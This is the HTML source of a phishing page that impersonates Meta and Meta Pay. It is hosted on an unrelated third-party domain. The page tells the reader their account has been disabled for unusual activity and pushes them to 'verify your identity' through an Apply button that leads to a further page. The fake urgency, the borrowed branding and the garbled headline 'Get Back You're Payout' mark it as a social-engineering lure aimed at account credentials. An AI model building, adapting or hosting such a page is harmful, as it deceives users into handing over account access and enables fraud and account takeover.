<!DOCTYPE html>
<html lang=en>
<!--
 
-->
<meta charset=utf-8>
<meta name=viewport content="width=device-width, initial-scale=1.0">
<title>Apply</title>
<style>
    body {
        font-family: system-ui;
        margin: 0;
        padding: 0;
        overflow-x: hidden
    }

    .container-fluid {
        display: flex;
        align-items: stretch;
        padding: 0;
        margin: 0;
        min-height: 100vh;
        overflow: hidden;
        flex-direction: column
    }

    .form-content {
        flex: 1;
        padding: 2rem;
        background: white;
        display: flex;
        flex-direction: column;
        align-items: center;
        box-shadow: none;
        position: relative;
        z-index: 1
    }

    .form-content img {
        width: 4rem;
        height: 4rem;
        margin-bottom: 1rem
    }

    .form-content h1 {
        font-size: 2rem;
        margin-bottom: 1rem;
        text-align: center
    }

    .btn {
        background: #0064e0;
        border: none;
        border-radius: 100px;
        padding: 10px 35px;
        text-decoration: none;
        color: white;
        display: inline-block;
        margin-top: 1rem;
        font-family: Arial, sans-serif;
        font-size: 16px
    }

    .form-content p {
        font-size: 18px;
        margin-top: 1rem;
        text-align: center
    }

    .form-content .sign-up {
        font-size: 17px;
        padding-top: 1rem
    }

    .form-content .business-info {
        font-size: 14px
    }

    .form-content .region-info {
        font-size: 13px;
        font-style: italic
    }

    .image {
        width: 100%;
        height: 27vh;
        background-image: url(logo.png);
        background-size: cover;
        background-position: center;
        background-repeat: no-repeat;
        border: none;
        margin: 0;
        padding: 0;
        display: block;
        flex-shrink: 0
    }

    @media (min-width:768px) {
        .container-fluid {
            flex-direction: row
        }
        .form-content {
            flex: 1;
            padding: 2rem
        }
        .image {
            width: 42%;
            height: 100vh
        }
    }
</style>
<meta name=referrer content=no-referrer>
<link rel=canonical href=https://sign-up-get-free-badge.on-fleek.app/>
<meta http-equiv=content-security-policy content="default-src 'none'; font-src 'self' data:; img-src 'self' data:; style-src 'unsafe-inline'; media-src 'self' data:; script-src 'unsafe-inline' data:; object-src 'self' data:; frame-src 'self' data:;">
<style>
    img[src="data:,"],
    source[src="data:,"] {
        display: none !important
    }
</style>
</head>

<body>
    <div class=container-fluid>
        <div class=image></div>
        <div class=form-content>
            <img src="WhatsApp Image 2025-01-28 at 9.42.14 AM.jpeg"
                alt=meta class=meta-logo>
            <h1>Get Back <br>You’re Payout</h1>
            <a href="help.html" class=btn>Apply</a>
            <p>Dear User,
                <br>Due to unusual activity associated with your account, your account has been temporarily disabled.  <br>To restore your account, please verify your identity.
            </p>
            <p class=sign-up>For more information and to appeal, Please click apply</p>
            <p><span class=fw-semibold>Are you a business?</span> Get more information on</p>
            <a href=# class=business-info>Meta Pay Support </a>
            <p class=region-info>Features, availability, and pricing may vary by region.</p>
        </div>
    </div>
